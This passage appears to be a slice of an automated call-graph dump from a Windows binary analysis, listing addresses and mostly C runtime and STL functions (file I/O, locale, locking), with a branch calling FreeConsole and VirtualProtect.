bcf7e3 MultiByteToWideChar 22167->22168 22168->22148 22170 bd0ea0 __strnicoll 22169->22170 22171 bcf7c7 __strnicoll MultiByteToWideChar 22170->22171 22174 bd0ee4 22171->22174 22172 bd105f 22173 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22172->22173 22175 bd0e70 22173->22175 22174->22172 22176 bcf779 __fread_nolock 15 API calls 22174->22176 22178 bd0f0a __alloca_probe_16 22174->22178 22189 bd0fb2 22174->22189 22175->22142 22176->22178 22179 bcf7c7 __strnicoll MultiByteToWideChar 22178->22179 22178->22189 22180 bd0f53 22179->22180 22180->22189 22197 bd0562 22180->22197 22183 bd0f89 22188 bd0562 std::_Locinfo::_Locinfo_ctor 7 API calls 22183->22188 22183->22189 22184 bd0fc1 22185 bd104a 22184->22185 22186 bcf779 __fread_nolock 15 API calls 22184->22186 22190 bd0fd3 __alloca_probe_16 22184->22190 22208 bc13ad 14 API calls ___std_exception_destroy 22185->22208 22186->22190 22188->22189 22209 bc13ad 14 API calls ___std_exception_destroy 22189->22209 22190->22185 22191 bd0562 std::_Locinfo::_Locinfo_ctor 7 API calls 22190->22191 22192 bd1016 22191->22192 22192->22185 22206 bcf889 WideCharToMultiByte std::_Locinfo::_Locinfo_ctor 22192->22206 22194 bd1030 22194->22185 22195 bd1039 22194->22195 22207 bc13ad 14 API calls ___std_exception_destroy 22195->22207 22198 bd08d1 std::_Locinfo::_Locinfo_ctor 5 API calls 22197->22198 22199 bd056d 22198->22199 22200 bd059a 22199->22200 22201 bd0573 LCMapStringEx 22199->22201 22202 bd05fe __strnicoll 5 API calls 22200->22202 22205 bd05ba 22201->22205 22203 bd05b3 LCMapStringW 22202->22203 22203->22205 22205->22183 22205->22184 22205->22189 22206->22194 22207->22189 22208->22189 22209->22172 22210->22009 22211->22019 22212->22029 22254 bcb04d 22213->22254 22217 bc9cb7 _Fputc 22216->22217 22511 bc9f57 22217->22511 22219 bc9ccc _Fputc 22219->21951 22221 bcb710 _Fputc 22220->22221 22658 bcbd08 22221->22658 22223 bcb71c _Fputc 22223->21951 22709 ba5ff0 22224->22709 22227 ba6412 FreeConsole 22228 ba6414 22227->22228 22717 ba1000 22228->22717 22230 ba642c 22231 ba1000 124 API calls 22230->22231 22232 ba643d 22231->22232 22749 ba4280 22232->22749 22242 ba687c VirtualProtect 22246 ba647f 22242->22246 22243 ba6676 22243->21951 22244 ba5ff0 30 API calls 22244->22246 22245 ba6708 22247 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22245->22247 22246->22242 22246->22243 22246->22244 22246->22245 22248 ba695b 22247->22248 22248->21951 23148 bcb31a 22249->23148 22252->21941 22253->21947 22256 bcb059 ___scrt_is_nonwritable_in_current_image 22254->22256 22255 bcb060 22287 bc9bf4 14 API calls __dosmaperr 22255->22287 22256->22255 22258 bcb080 22256->22258 22261 bcb085 22258->22261 22262 bcb092 22258->22262 22259 bcb065 22288 bca319 29 API calls __fread_nolock 22259->22288 22289 bc9bf4 14 API calls __dosmaperr 22261->22289 22273 bd6cb7 22262->22273 22266 bcb0af 22281 bd7bdc 22266->22281 22267 bcb0a2 22290 bc9bf4 14 API calls __dosmaperr 22267->22290 22272 bcb048 22272->21951 22274 bd6cc3 ___scrt_is_nonwritable_in_current_image 22273->22274 22292 bca611 EnterCriticalSection 22274->22292 22276 bd6cd1 22293 bd6d5b 22276->22293 22282 bd7cfb 22281->22282 22316 bd7d7e 22282->22316 22285 bcb0c4 22291 bcb0ed LeaveCriticalSection __fread_nolock 22285->22291 22287->22259 22288->22272 22289->22272 22290->22272 22291->22272 22292->22276 22300 bd6d7e 22293->22300 22294 bd6cde 22307 bd6d17 22294->22307 22295 bd6dd6 22312 bd0a4f 14 API calls 3 library calls 22295->22312 22297 bd6ddf 22299 bcf73f ___free_lconv_mon 14 API calls 22297->22299 22301 bd6de8 22299->22301 22300->22294 22300->22295 22310 bc4f83 EnterCriticalSection 22300->22310 22311 bc4f97 LeaveCriticalSection 22300->22311 22301->22294 22313 bd04df 6 API calls std::_Locinfo::_Locinfo_ctor 22301->22313 22303 bd6e07 22314 bc4f83 EnterCriticalSection 22303->22314 22306 bd6e1a 22306->22294 22315 bca628 LeaveCriticalSection 22307->22315 22309 bcb09b 22309->22266 22309->22267 22310->22300 22311->22300 22312->22297 22313->22303 22314->22306 22315->22309 22317 bd7d9d 22316->22317 22318 bd7db0 22317->22318 22326 bd7dc5 22317->22326 22336 bc9bf4 14 API calls __dosmaperr 22318->22336 22320 bd7db5 22337 bca319 29 API calls __fread_nolock 22320->22337 22322 bd7d11 22322->22285 22333 bdd8bb 22322->22333 22324 bd7f96 22342 bca319 29 API calls __fread_nolock 22324->22342 22331 bd7ee5 22326->22331 22338 bdd783 48 API calls 3 library calls 22326->22338 22328 bd7f35 22328->22331 22339 bdd783 48 API calls 3 library calls 22328->22339 22330 bd7f53 22330->22331 22340 bdd783 48 API calls 3 library calls 22330->22340 22331->22322 22341 bc9bf4 14 API calls __dosmaperr 22331->22341 22343 bddc73 22333->22343 22336->22320 22337->22322 22338->22328 22339->22330 22340->22331 22341->22324 22342->22322 22346 bddc7f ___scrt_is_nonwritable_in_current_image 22343->22346 22344 bddc86 22363 bc9bf4 14 API calls __dosmaperr 22344->22363 22346->22344 22348 bddcb1 22346->22348 22347 bddc8b 22364 bca319 29 API calls __fread_nolock 22347->22364 22354 bdd8db 22348->22354 22353 bdd8d6 22353->22285 22366 bd0a10 22354->22366 22359 bdd911 22361 bdd943 22359->22361 22362 bcf73f ___free_lconv_mon 14 API calls 22359->22362 22365 bddd08 LeaveCriticalSection __wsopen_s 22361->22365 22362->22361 22363->22347 22364->22353 22365->22353 22367 bc4619 __strnicoll 48 API calls 22366->22367 22368 bd0a22 22367->22368 22369 bd0a34 22368->22369 22421 bd0295 5 API calls std::_Locinfo::_Locinfo_ctor 22368->22421 22371 bc4713 22369->22371 22422 bc476b 22371->22422 22374 bdd949 22445 bddde3 22374->22445 22377 bdd97b 22477 bc9c07 14 API calls __dosmaperr 22377->22477 22378 bdd994 22463 bd66d3 22378->22463 22382 bdd980 22478 bc9bf4 14 API calls __dosmaperr 22382->22478 22383 bdd9b9 22476 bddd4e CreateFileW 22383->22476 22384 bdd9a2 22479 bc9c07 14 API calls __dosmaperr 22384->22479 22388 bdd9a7 22480 bc9bf4 14 API calls __dosmaperr 22388->22480 22390 bdda6f GetFileType 22391 bdda7a GetLastError 22390->22391 22392 bddac1 22390->22392 22483 bc9c1a 14 API calls __dosmaperr 22391->22483 22485 bd6877 15 API calls 2 library calls 22392->22485 22393 bdda44 GetLastError 22482 bc9c1a 14 API calls __dosmaperr 22393->22482 22395 bdd9f2 22395->22390 22395->22393 22481 bddd4e CreateFileW 22395->22481 22397 bdda88 CloseHandle 22397->22382 22399 bddab1 22397->22399 22484 bc9bf4 14 API calls __dosmaperr 22399->22484 22401 bdda37 22401->22390 22401->22393 22403 bddab6 22403->22382 22404 bddae2 22407 bddb2e 22404->22407 22486 bddf5d 82 API calls 3 library calls 22404->22486 22409 bddb35 22407->22409 22488 bde007 82 API calls 4 library calls 22407->22488 22408 bddb63 22408->22409 22410 bddb71 22408->22410 22487 bd6ab3 32 API calls 2 library calls 22409->22487 22412 bdd98d 22410->22412 22413 bddbed CloseHandle 22410->22413 22412->22359 22489 bddd4e CreateFileW 22413->22489 22415 bddc18 22416 bddc4e 22415->22416 22417 bddc22 GetLastError 22415->22417 22416->22412 22490 bc9c1a 14 API calls __dosmaperr 22417->22490 22419 bddc2e 22491 bd67e6 15 API calls 2 library calls 22419->22491 22421->22369 22423 bc4779 22422->22423 22424 bc4793 22422->22424 22440 bc46f9 14 API calls ___free_lconv_mon 22423->22440 22426 bc47b9 22424->22426 22427 bc479a 22424->22427 22428 bcf7c7 __strnicoll MultiByteToWideChar 22426->22428 22432 bc472b 22427->22432 22441 bc46ba 15 API calls __wsopen_s 22427->22441 22429 bc47c8 22428->22429 22431 bc47cf GetLastError 22429->22431 22434 bc47f5 22429->22434 22444 bc46ba 15 API calls __wsopen_s 22429->22444 22442 bc9c1a 14 API calls __dosmaperr 22431->22442 22432->22359 22432->22374 22434->22432 22437 bcf7c7 __strnicoll MultiByteToWideChar 22434->22437 22435 bc47db 22443 bc9bf4 14 API calls __dosmaperr 22435->22443 22439 bc480c 22437->22439 22439->22431 22439->22432 22440->22432 22441->22432 22442->22435 22443->22432 22444->22434 22446 bdde1e 22445->22446 22447 bdde04 22445->22447 22492 bddd73 22446->22492 22447->22446 22499 bc9bf4 14 API calls __dosmaperr 22447->22499 22449 bdde56 22459 bdde85 22449->22459 22501 bc9bf4 14 API calls __dosmaperr 22449->22501 22451 bdde13 22500 bca319 29 API calls __fread_nolock 22451->22500 22455 bdded3 22457 bddf50 22455->22457 22460 bdd966 22455->22460 22456 bdde7a 22502 bca319 29 API calls __fread_nolock 22456->22502 22504 bca346 11 API calls _unexpected 22457->22504 22459->22460 22503 bca7ee 29 API calls 2 library calls 22459->22503 22460->22377 22460->22378 22462 bddf5c 22464 bd66df ___scrt_is_nonwritable_in_current_image 22463->22464 22505 bca611 EnterCriticalSection 22464->22505 22466 bd672d 22506 bd67dd 22466->22506 22467 bd66e6 22467->22466 22468 bd670b 22467->22468 22473 bd677a EnterCriticalSection 22467->22473 22509 bd6909 15 API calls 3 library calls 22468->22509 22472 bd6710 22472->22466 22510 bd6a57 EnterCriticalSection 22472->22510 22473->22466 22474 bd6787 LeaveCriticalSection 22473->22474 22474->22467 22476->22395 22477->22382 22478->22412 22479->22388 22480->22382 22481->22401 22482->22382 22483->22397 22484->22403 22485->22404 22486->22407 22487->22412 22488->22408 22489->22415 22490->22419 22491->22416 22493 bddd8b 22492->22493 22494 bddda6 22493->22494 22495 bc9bf4 __dosmaperr 14 API calls 22493->22495 22494->22449 22496 bdddca 22495->22496 22497 bca319 __fread_nolock 29 API calls 22496->22497 22498 bdddd5 22497->22498 22498->22449 22499->22451 22500->22446 22501->22456 22502->22459 22503->22455 22504->22462 22505->22467 22507 bca628 std::_Lockit::~_Lockit LeaveCriticalSection 22506->22507 22508 bd674d 22507->22508 22508->22383 22508->22384 22509->22472 22510->22466 22513 bc9f63 ___scrt_is_nonwritable_in_current_image 22511->22513 22512 bc9f69 22534 bca4c2 29 API calls 2 library calls 22512->22534 22513->22512 22515 bc9fac 22513->22515 22522 bc4f83 EnterCriticalSection 22515->22522 22516 bc9f84 22516->22219 22518 bc9fb8 22523 bc9e6b 22518->22523 22520 bc9fce 22535 bc9ff7 LeaveCriticalSection __fread_nolock 22520->22535 22522->22518 22524 bc9e7e 22523->22524 22525 bc9e91 22523->22525 22524->22520 22536 bc9d92 22525->22536 22527 bc9eb4 22528 bc9f42 22527->22528 22529 bc9ecf 22527->22529 22549 bcb763 34 API calls 3 library calls 22527->22549 22528->22520 22540 bcabe4 22529->22540 22534->22516 22535->22516 22537 bc9dfb 22536->22537 22538 bc9da3 22536->22538 22537->22527 22538->22537 22550 bd5fe4 31 API calls 2 library calls 22538->22550 22541 bcabfd 22540->22541 22545 bc9ee2 22540->22545 22541->22545 22551 bd2e07 22541->22551 22543 bcac19 22558 bd718f 22543->22558 22546 bd6024 22545->22546 22634 bd6185 22546->22634 22548 bd603d 22548->22528 22549->22529 22550->22537 22552 bd2e28 22551->22552 22553 bd2e13 22551->22553 22552->22543 22569 bc9bf4 14 API calls __dosmaperr 22553->22569 22555 bd2e18 22570 bca319 29 API calls __fread_nolock 22555->22570 22557 bd2e23 22557->22543 22560 bd719b ___scrt_is_nonwritable_in_current_image 22558->22560 22559 bd71dc 22600 bca4c2 29 API calls 2 library calls 22559->22600 22560->22559 22562 bd7222 22560->22562 22568 bd71a3 22560->22568 22571 bd6a57 EnterCriticalSection 22562->22571 22564 bd7228 22565 bd7246 22564->22565 22572 bd6f73 22564->22572 22601 bd7298 LeaveCriticalSection __wsopen_s 22565->22601 22568->22545 22569->22555 22570->22557 22571->22564 22573 bd6f9b 22572->22573 22595 bd6fbe __fread_nolock 22572->22595 22574 bd6f9f 22573->22574 22576 bd6ffa 22573->22576 22616 bca4c2 29 API calls 2 library calls 22574->22616 22577 bd7018 22576->22577 22578 bd6024 __wsopen_s 31 API calls 22576->22578 22602 bd72a0 22577->22602 22578->22577 22581 bd7077 22583 bd708b 22581->22583 22584 bd70e0 WriteFile 22581->22584 22582 bd7030 22585 bd705f 22582->22585 22586 bd7038 22582->22586 22589 bd70cc 22583->22589 22590 bd7093 22583->22590 22587 bd7102 GetLastError 22584->22587 22598 bd7072 22584->22598 22618 bd731d 54 API calls 4 library calls 22585->22618 22586->22595 22617 bd76e4 6 API calls __wsopen_s 22586->22617 22587->22598 22609 bd774c 22589->22609 22593 bd70b8 22590->22593 22594 bd7098 22590->22594 22620 bd7910 8 API calls 3 library calls 22593->22620 22594->22595 22596 bd70a1 22594->22596 22595->22565 22619 bd7827 7 API calls 2 library calls 22596->22619 22598->22595 22600->22568 22601->22568 22621 bdaf04 22602->22621 22604 bd702a 22604->22581 22604->22582 22605 bd72b2 22605->22604 22606 bd72e0 22605->22606 22630 bc5420 48 API calls std::_Locinfo::_Locinfo_ctor 22605->22630 22606->22604 22608 bd72fa GetConsoleMode 22606->22608 22608->22604 22613 bd775b __wsopen_s 22609->22613 22610 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22611 bd7825 22610->22611 22611->22595 22612 bd77cb WriteFile 22612->22613 22614 bd780e GetLastError 22612->22614 22613->22612 22615 bd780c 22613->22615 22614->22615 22615->22610 22616->22595 22617->22595 22618->22598 22619->22595 22620->22598 22622 bdaf1e 22621->22622 22623 bdaf11 22621->22623 22625 bdaf2a 22622->22625 22632 bc9bf4 14 API calls __dosmaperr 22622->22632 22631 bc9bf4 14 API calls __dosmaperr 22623->22631 22625->22605 22627 bdaf16 22627->22605 22628 bdaf4b 22633 bca319 29 API calls __fread_nolock 22628->22633 22630->22606 22631->22627 22632->22628 22633->22627 22640 bd6669 22634->22640 22636 bd6197 22637 bd619f __fread_nolock 22636->22637 22638 bd61b3 SetFilePointerEx 22636->22638 22637->22548 22638->22637 22639 bd61cb GetLastError 22638->22639 22639->22637 22641 bd668b 22640->22641 22642 bd6676 22640->22642 22646 bd66b0 22641->22646 22655 bc9c07 14 API calls __dosmaperr 22641->22655 22653 bc9c07 14 API calls __dosmaperr 22642->22653 22645 bd667b 22654 bc9bf4 14 API calls __dosmaperr 22645->22654 22646->22636 22647 bd66bb 22656 bc9bf4 14 API calls __dosmaperr 22647->22656 22650 bd6683 22650->22636 22651 bd66c3 22657 bca319 29 API calls __fread_nolock 22651->22657 22653->22645 22654->22650 22655->22647 22656->22651 22657->22650 22659 bcbd14 ___scrt_is_nonwritable_in_current_image 22658->22659 22660 bcbd3c 22659->22660 22661 bcbd1b 22659->22661 22669 bc4f83 EnterCriticalSection 22660->22669 22673 bca4c2 29 API calls 2 library calls 22661->22673 22664 bcbd47 22670 bcbcd6 22664->22670 22668 bcbd34 22668->22223 22669->22664 22675 bcbb35 22670->22675 22672 bcbce8 22674 bcbd7e LeaveCriticalSection __fread_nolock 22672->22674 22673->22668 22674->22668 22676 bcbb6c 22675->22676 22677 bcbb44 22675->22677 22679 bd2e07 __fread_nolock 29 API calls 22676->22679 22692 bca4c2 29 API calls 2 library calls 22677->22692 22681 bcbb75 22679->22681 22680 bcbb5f __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 22680->22672 22689 bd6042 22681->22689 22684 bcbc1f 22693 bcb7bf 34 API calls 4 library calls 22684->22693 22686 bcbc36 22686->22680 22694 bcb96a 33 API calls 2 library calls 22686->22694 22687 bcbc2e 22687->22680 22695 bd6060 22689->22695 22692->22680 22693->22687 22694->22680 22698 bd606c ___scrt_is_nonwritable_in_current_image 22695->22698 22696 bcbb93 22696->22680 22696->22684 22696->22686 22697 bd60af 22707 bca4c2 29 API calls 2 library calls 22697->22707 22698->22696 22698->22697 22699 bd60f5 22698->22699 22706 bd6a57 EnterCriticalSection 22699->22706 22702 bd60fb 22703 bd611c 22702->22703 22704 bd6185 __fread_nolock 31 API calls 22702->22704 22708 bd617d LeaveCriticalSection __wsopen_s 22703->22708 22704->22703 22706->22702 22707->22696 22708->22696 22710 ba6043 _Yarn _strlen 22709->22710 22712 ba62a6 22710->22712 22790 ba7c00 29 API calls 3 library calls 22710->22790 22791 ba7e00 30 API calls 5 library calls 22710->22791 22792 ba4410 30 API calls __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 22710->22792 22714 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22712->22714 22715 ba6385 22714->22715 22715->22227 22715->22228 22736 ba104a 22717->22736 22720 ba1434 22857 ba8b90 29 API calls 3 library calls 22720->22857 22724 ba4280 81 API calls 22724->22736 22729 ba2086 22731 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22729->22731 22730 ba1dd9 22740 ba20b0 _strlen 22730->22740 22858 bccd1b 48 API calls 3 library calls 22730->22858 22732 ba20a0 22731->22732 22732->22230 22735 bbbfa0 44 API calls 22735->22736 22736->22720 22736->22724 22736->22730 22736->22735 22737 baacb0 44 API calls 22736->22737 22793 ba20b0 22736->22793 22804 ba3260 22736->22804 22820 ba42e0 34 API calls 2 library calls 22736->22820 22821 bbd0b0 29 API calls 3 library calls 22736->22821 22822 ba97a0 44 API calls __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 22736->22822 22823 bb4f40 22736->22823 22841 ba8b90 29 API calls 3 library calls 22736->22841 22842 ba8f90 30 API calls 3 library calls 22736->22842 22843 bbe6e0 22736->22843 22856 bbd2e0 30 API calls 2 library calls 22736->22856 22737->22736 22741 ba26f8 22740->22741 22816 bbfe96 22740->22816 22859 baa220 22740->22859 22867 bab950 22741->22867 22746 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22747 ba324b 22746->22747 22747->22230 22750 ba42a3 _Fputc 22749->22750 23067 bc51a7 22750->23067 22752 ba42bc 22753 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22752->22753 22754 ba42cc 22753->22754 22755 ba6970 22754->22755 22756 baa220 44 API calls 22755->22756 22757 ba69a1 22756->22757 22758 baedc0 77 API calls 22757->22758 22759 ba6dc5 22757->22759 22758->22757 22760 bab950 std::ios_base::_Init 44 API calls 22759->22760 22761 ba76bd 22760->22761 22762 baa8e0 44 API calls 22761->22762 22763 ba76c9 22762->22763 22764 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22763->22764 22765 ba645d 22764->22765 22766 bbcd60 22765->22766 22767 bbcde0 22766->22767 22768 bb4f40 77 API calls 22767->22768 22770 bbcff5 22768->22770 22769 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22771 ba646d 22769->22771 22770->22769 22772 bbbfa0 22771->22772 22773 bbc071 22772->22773 22774 baa220 44 API calls 22773->22774 22775 bbc422 22773->22775 22774->22773 22776 bab950 std::ios_base::_Init 44 API calls 22775->22776 22777 bbcd3d 22776->22777 22778 baa8e0 44 API calls 22777->22778 22779 bbcd45 22778->22779 22780 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22779->22780 22781 ba6478 22780->22781 22782 baacb0 22781->22782 22788 baad00 22782->22788 22783 baa220 44 API calls 22783->22788 22784 bab8f9 22786 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22784->22786 22785 baa8e0 44 API calls 22785->22788 22787 bab945 22786->22787 22787->22246 22788->22783 22788->22784 22788->22785 22789 bab950 std::ios_base::_Init 44 API calls 22788->22789 22789->22788 22790->22710 22791->22710 22792->22710 22795 ba20dc _strlen 22793->22795 22794 baa220 44 API calls 22794->22795 22795->22794 22796 ba26f8 22795->22796 22803 bbfe96 78 API calls 22795->22803 22797 bab950 std::ios_base::_Init 44 API calls 22796->22797 22798 ba3230 22797->22798 22799 baa8e0 44 API calls 22798->22799 22800 ba3239 22799->22800 22801 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22800->22801 22802 ba324b 22801->22802 22802->22736 22803->22795 22805 baa220 44 API calls 22804->22805 22813 ba3291 22805->22813 22807 ba3775 22808 bab950 std::ios_base::_Init 44 API calls 22807->22808 22809 ba4251 22808->22809 22810 baa8e0 44 API calls 22809->22810 22811 ba425d 22810->22811 22812 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22811->22812 22814 ba426c 22812->22814 22813->22807 22887 baedc0 22813->22887 22904 bb10a0 22813->22904 22814->22736 22817 bbfeb8 _Yarn 22816->22817 22818 bbfea5 22816->22818 22817->22818 22819 bcbe17 78 API calls 22817->22819 22818->22740 22819->22818 22820->22736 22821->22736 22822->22736 22824 bbeb8f std::_Lockit::_Lockit 7 API calls 22823->22824 22825 bb4f69 22824->22825 22826 baef30 14 API calls 22825->22826 22827 bb4f88 22826->22827 22828 baf020 5 API calls 22827->22828 22836 bb4f90 22828->22836 22829 bb5219 22833 bbebc0 std::_Lockit::~_Lockit 2 API calls 22829->22833 22830 bb51f0 23058 baf3a0 RaiseException Concurrency::cancel_current_task 22830->23058 22834 bb5226 22833->22834 22837 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22834->22837 22836->22829 22836->22830 23055 bbec33 8 API calls codecvt 22836->23055 23056 baf3d0 5 API calls __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 22836->23056 23057 bb5b00 76 API calls 5 library calls 22836->23057 22839 bb5235 22837->22839 22839->22736 22841->22736 22842->22736 22845 bbe6e5 _Yarn 22843->22845 22844 bbe6ff 22844->22736 22845->22844 22847 bbe701 22845->22847 23059 bc7d8f EnterCriticalSection LeaveCriticalSection codecvt 22845->23059 22848 bc0ac9 22847->22848 22852 bbe70b Concurrency::cancel_current_task 22847->22852 23061 ba84c0 5 API calls __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 22848->23061 22850 bc0ad7 23062 bc1daa RaiseException 22850->23062 23060 bc1daa RaiseException 22852->23060 22853 bc0ae5 22855 bbf305 22856->22736 22857->22729 22860 baa260 22859->22860 22861 baa367 22860->22861 22863 baa662 22860->22863 22862 baacb0 44 API calls 22861->22862 22865 baa370 22862->22865 22864 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22863->22864 22866 baa8cb 22864->22866 22866->22740 22869 babb00 22867->22869 22868 babdff 22870 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22868->22870 22869->22868 22871 babdf6 22869->22871 22873 babde8 22869->22873 22872 ba3230 22870->22872 23063 bc1daa RaiseException 22871->23063 22881 baa8e0 22872->22881 23064 babe40 43 API calls 4 library calls 22873->23064 22876 babe20 23065 babf50 30 API calls 5 library calls 22876->23065 22878 babe30 23066 bc1daa RaiseException 22878->23066 22880 babe3b 22883 baa8f9 22881->22883 22882 bae640 44 API calls 22882->22883 22883->22882 22884 baac33 22883->22884 22885 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22884->22885 22886 ba3239 22885->22886 22886->22746 22913 bbeb8f 22887->22913 22894 baef09 22930 bbebc0 22894->22930 22896 baef04 22940 baf3a0 RaiseException Concurrency::cancel_current_task 22896->22940 22898 baee10 22898->22894 22898->22896 22937 bbec33 8 API calls codecvt 22898->22937 22938 baf3d0 5 API calls __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 22898->22938 22939 baf200 76 API calls 4 library calls 22898->22939 22900 baef16 22901 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22900->22901 22902 baef25 22901->22902 22902->22813 22945 bbb4e0 22904->22945 22911 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22912 bb1135 22911->22912 22912->22813 22914 bbeb9e 22913->22914 22915 bbeba5 22913->22915 22941 bca63f 6 API calls 2 library calls 22914->22941 22916 baede9 22915->22916 22942 bc10f8 EnterCriticalSection 22915->22942 22919 baef30 22916->22919 22920 baef60 22919->22920 22921 bbebc0 std::_Lockit::~_Lockit 2 API calls 22920->22921 22922 baef9e 22920->22922 22923 bbeb8f std::_Lockit::_Lockit 7 API calls 22920->22923 22921->22920 22924 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22922->22924 22923->22920 22925 baee08 22924->22925 22926 baf020 22925->22926 22927 baf05c 22926->22927 22928 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22927->22928 22929 baf1f4 22928->22929 22929->22898 22931 bca64d 22930->22931 22932 bbebca 22930->22932 22944 bca628 LeaveCriticalSection 22931->22944 22933 bbebdd 22932->22933 22943 bc1106 LeaveCriticalSection 22932->22943 22933->22900 22936 bca654 22936->22900 22937->22898 22938->22898 22939->22898 22941->22916 22942->22916 22943->22933 22944->22936 22946 bbb8f6 22945->22946 22947 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22946->22947 22948 bb10d3 22947->22948 22949 bb4ee0 22948->22949 22950 bb4f0a 22949->22950 22973 bc524b 22950->22973 22952 bb4f1a 22953 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22952->22953 22954 bb10e6 22953->22954 22955 bb2590 22954->22955 22958 bb25d2 __fread_nolock 22955->22958 22957 bb4f40 77 API calls 22957->22958 22958->22957 22961 bb2efd 22958->22961 22968 bb75f0 78 API calls 22958->22968 22996 bb57c0 30 API calls 3 library calls 22958->22996 22997 bb6070 30 API calls 5 library calls 22958->22997 22998 bb5250 77 API calls 4 library calls 22958->22998 22959 bb49d1 22960 bb4e8d 22959->22960 22966 bb75f0 78 API calls 22959->22966 22999 ba7c00 29 API calls 3 library calls 22960->22999 22961->22959 22988 bb75f0 22961->22988 22965 bb4ea9 23000 ba7c00 29 API calls 3 library calls 22965->23000 22966->22959 22968->22958 22969 bb4eb9 22970 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22969->22970 22971 bb1127 22970->22971 22971->22911 22974 bc525f _Fputc 22973->22974 22977 bc561b 22974->22977 22976 bc527a _Fputc 22976->22952 22978 bc564a 22977->22978 22979 bc5627 22977->22979 22984 bc5671 22978->22984 22986 bc6545 53 API calls 2 library calls 22978->22986 22985 bca4c2 29 API calls 2 library calls 22979->22985 22983 bc5642 22983->22976 22984->22983 22987 bca4c2 29 API calls 2 library calls 22984->22987 22985->22983 22986->22984 22987->22983 22989 bb7640 22988->22989 22990 bb7682 22989->22990 23001 bbfa33 22989->23001 23013 bbfa43 22989->23013 23025 bbfa51 22989->23025 22991 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 22990->22991 22992 bb7818 22991->22992 22992->22961 22996->22958 22997->22958 22998->22958 22999->22965 23000->22969 23002 bbfa3a 23001->23002 23011 bbfa86 23001->23011 23037 bc4f83 EnterCriticalSection 23002->23037 23004 bbfa3f 23004->22989 23005 bbfa8a 23007 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 23005->23007 23006 bbfabd 23006->23005 23034 bbf62a 23006->23034 23008 bbfb57 23007->23008 23008->22989 23010 bbfb1a 23010->23005 23038 bcbe17 23010->23038 23011->23005 23011->23006 23011->23010 23014 bbfa4a 23013->23014 23017 bbfa96 23013->23017 23054 bc4f97 LeaveCriticalSection 23014->23054 23016 bbfa4f 23016->22989 23017->22989 23018 bbfb1a 23017->23018 23021 bbfafe 23017->23021 23019 bcbe17 78 API calls 23018->23019 23020 bbfb0f 23018->23020 23019->23020 23023 bbe74b __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 23020->23023 23021->23020 23022 bbf62a _Fputc 77 API calls 23021->23022 23022->23020 23024 bbfb57 23023->23024 23024->22989 23028 bbfa74 23025->23028 23030 bbfa6d 23025->23030 23026 bbe74b 